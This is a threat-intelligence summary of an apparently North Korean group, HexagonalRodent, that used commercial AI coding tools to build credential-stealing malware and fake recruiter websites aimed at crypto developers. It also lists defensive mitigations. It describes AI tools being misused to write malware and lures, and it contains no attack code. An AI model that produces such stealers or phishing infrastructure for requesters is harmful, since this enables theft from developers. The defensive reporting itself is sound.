Full Report
One group of hackers used AI for everything from vibe coding their malware to creating fake company websites—and stole as much as $12 million in three months.
Analysis Summary
# Threat Actor: HexagonalRodent
## Attribution & Identity
* **Identification:** North Korean state-sponsored cybercrime group.
* **Aliases:** HexagonalRodent (assigned by Expel).
* **Associations:** Linked to known North Korean state hacking operations via command-and-control (C2) infrastructure.
* **Operator Profile:** Characterized as "mediocre" or "unskilled" hackers who lack the traditional capability to write complex code or manage sophisticated infrastructure manually.
## Activity Summary
Between early 2026 and April 2026, HexagonalRodent conducted a high-volume, AI-enabled campaign targeting the cryptocurrency and Web3 sectors. Using a strategy dubbed "vibe coding," the group utilized commercial AI tools to generate malware and phishing infrastructure. The operation successfully compromised over 2,000 computers and is estimated to have stolen or targeted up to $12 million in cryptocurrency over a three-month period.
## Tactics, Techniques & Procedures
* **AI-Enabled Development ("Vibe Coding"):** Used Large Language Models (LLMs) to write credential-stealing malware and build deceptive company websites.
* **Social Engineering:** Posed as recruiters offering fraudulent job opportunities at tech firms.
* **Malware Delivery:** Victims were instructed to download "coding assignments" as part of a technical interview process; these assignments contained embedded malware.
* **Credential Theft:** Specifically focused on stealing browser credentials and private keys for cryptocurrency wallets.
* **Operational Insecurity:** The group left their own infrastructure unsecured, leaking AI prompts and victim databases.
* **Code Characteristics:** AI-generated code features included heavy English annotation and the unusual presence of emojis within the source code.
## Targeting
* **Sectors:** Cryptocurrency, Non-Fungible Tokens (NFTs), and Web3 projects.
* **Geography:** Global (targeting individuals based on industry role rather than region).
* **Victims:** Specifically active developers, engineers, and creators working on small-scale cryptocurrency launches and Web3 startups.
## Tools & Infrastructure
* **AI Tools Used:** OpenAI (ChatGPT), Cursor, and Anima.
* **Malware:** Credential-stealing payloads (as yet unnamed generic malware).
* **Infrastructure:**
* Fake recruitment websites designed via AI.
* Command-and-Control (C2) servers previously associated with North Korean operations.
* Defanged Example: `hxxps[://]fake-tech-recruiter[.]com` (representative of the scheme).
## Implications
HexagonalRodent represents a shift in the threat landscape where AI tools significantly lower the barrier to entry for state-sponsored actors. Even "unskilled" operators can now execute broad, profitable campaigns by automating the development of malware and social engineering lures. While the current output is detectable by standard EDR (Endpoint Detection and Response) tools, the speed and scale at which these "mediocre" actors can iterate pose a challenge to traditional defense cycles.
## Mitigations
* **Code Review & Verification:** Developers should treat any third-party "test" code or assignments as untrusted and execute them only in isolated, sandboxed environments.
* **Hardware Security Keys:** Use of hardware tokens (e.g., YubiKeys) to protect crypto wallets and sensitive accounts to prevent credential-stealing malware from gaining full access.
* **Endpoint Detection (EDR):** Deploy and maintain updated EDR solutions, as the current AI-generated malware often follows standard, detectable behavioral patterns.
* **Vetting Recruitment:** Verify the identity of recruiters and the legitimacy of company domains via secondary channels before downloading any attachments.